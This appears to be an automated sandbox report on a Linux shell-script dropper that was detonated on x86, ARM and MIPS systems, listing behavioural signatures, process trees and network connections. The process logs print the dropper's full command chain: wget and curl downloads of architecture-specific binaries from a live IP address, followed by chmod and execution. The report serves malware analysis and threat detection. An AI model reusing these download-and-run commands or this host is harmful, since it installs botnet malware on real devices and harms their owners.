Analysis Overview
SHA256
979ed6b90ceebe0bc4b8d4d4ac67f359d12fddf2fc5d837421a114f5db247093
Threat Level: Shows suspicious behavior
The file 513641f5f60d55559c2060489de6d605.bin was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
File and Directory Permissions Modification
Checks CPU configuration
System Network Configuration Discovery
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-24 01:19
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-24 01:19
Reported
2024-11-24 01:22
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
25s
Max time network
128s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/3AvA | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/3AvA | /tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh | N/A |
Processes
/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
[/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.x86]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.x86]
/bin/cat
[cat UnHAnaAW.x86]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]
/tmp/3AvA
[./3AvA x86]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.mips]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.mips]
/bin/cat
[cat UnHAnaAW.mips]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]
/tmp/3AvA
[./3AvA mips]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.mpsl]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.mpsl]
/bin/cat
[cat UnHAnaAW.mpsl]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]
/tmp/3AvA
[./3AvA mpsl]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm4]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm4]
/bin/cat
[cat UnHAnaAW.arm4]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]
/tmp/3AvA
[./3AvA arm4]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm5]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm5]
/bin/cat
[cat UnHAnaAW.arm5]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]
/tmp/3AvA
[./3AvA arm5]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm6]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm6]
/bin/cat
[cat UnHAnaAW.arm6]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]
/tmp/3AvA
[./3AvA arm6]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm7]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm7]
/bin/cat
[cat UnHAnaAW.arm7]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]
/tmp/3AvA
[./3AvA arm7]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.ppc]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.ppc]
/bin/cat
[cat UnHAnaAW.ppc]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]
/tmp/3AvA
[./3AvA ppc]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.m68k]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.m68k]
/bin/cat
[cat UnHAnaAW.m68k]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]
/tmp/3AvA
[./3AvA m68k]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.sh4]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.sh4]
/bin/cat
[cat UnHAnaAW.sh4]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]
/tmp/3AvA
[./3AvA sh4]
Network
| Country | Destination | Domain | Proto |
| NL | 89.22.230.162:80 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| GB | 195.181.164.15:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-24 01:19
Reported
2024-11-24 01:22
Platform
debian9-armhf-20240611-en
Max time kernel
26s
Max time network
64s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /tmp/3AvA | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/3AvA | /tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh | N/A |
Processes
/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
[/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.x86]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.x86]
/bin/cat
[cat UnHAnaAW.x86]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]
/tmp/3AvA
[./3AvA x86]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.mips]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.mips]
/bin/cat
[cat UnHAnaAW.mips]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]
/tmp/3AvA
[./3AvA mips]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.mpsl]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.mpsl]
/bin/cat
[cat UnHAnaAW.mpsl]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]
/tmp/3AvA
[./3AvA mpsl]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm4]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm4]
/bin/cat
[cat UnHAnaAW.arm4]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]
/tmp/3AvA
[./3AvA arm4]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm5]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm5]
/bin/cat
[cat UnHAnaAW.arm5]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]
/tmp/3AvA
[./3AvA arm5]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm6]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm6]
/bin/cat
[cat UnHAnaAW.arm6]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]
/tmp/3AvA
[./3AvA arm6]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm7]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm7]
/bin/cat
[cat UnHAnaAW.arm7]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]
/tmp/3AvA
[./3AvA arm7]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.ppc]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.ppc]
/bin/cat
[cat UnHAnaAW.ppc]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]
/tmp/3AvA
[./3AvA ppc]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.m68k]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.m68k]
/bin/cat
[cat UnHAnaAW.m68k]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]
/tmp/3AvA
[./3AvA m68k]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.sh4]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.sh4]
/bin/cat
[cat UnHAnaAW.sh4]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]
/tmp/3AvA
[./3AvA sh4]
Network
| Country | Destination | Domain | Proto |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp |
Files
memory/818-1-0xb676f000-0xb6780044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-24 01:19
Reported
2024-11-24 01:22
Platform
debian9-mipsbe-20240611-en
Max time kernel
69s
Max time network
72s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /tmp/3AvA | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/3AvA | /tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh | N/A |
Processes
/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
[/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.x86]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.x86]
/bin/cat
[cat UnHAnaAW.x86]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-eoiSMk]
/tmp/3AvA
[./3AvA x86]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.mips]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.mips]
/bin/cat
[cat UnHAnaAW.mips]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-eoiSMk]
/tmp/3AvA
[./3AvA mips]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.mpsl]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.mpsl]
/bin/cat
[cat UnHAnaAW.mpsl]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-eoiSMk]
/tmp/3AvA
[./3AvA mpsl]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm4]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm4]
/bin/cat
[cat UnHAnaAW.arm4]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]
/tmp/3AvA
[./3AvA arm4]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm5]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm5]
/bin/cat
[cat UnHAnaAW.arm5]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]
/tmp/3AvA
[./3AvA arm5]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm6]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm6]
/bin/cat
[cat UnHAnaAW.arm6]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]
/tmp/3AvA
[./3AvA arm6]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm7]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm7]
/bin/cat
[cat UnHAnaAW.arm7]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]
/tmp/3AvA
[./3AvA arm7]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.ppc]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.ppc]
/bin/cat
[cat UnHAnaAW.ppc]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]
/tmp/3AvA
[./3AvA ppc]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.m68k]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.m68k]
/bin/cat
[cat UnHAnaAW.m68k]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]
/tmp/3AvA
[./3AvA m68k]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.sh4]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.sh4]
/bin/cat
[cat UnHAnaAW.sh4]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]
/tmp/3AvA
[./3AvA sh4]
Network
| Country | Destination | Domain | Proto |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
| NL | 89.22.230.162:80 | tcp | |
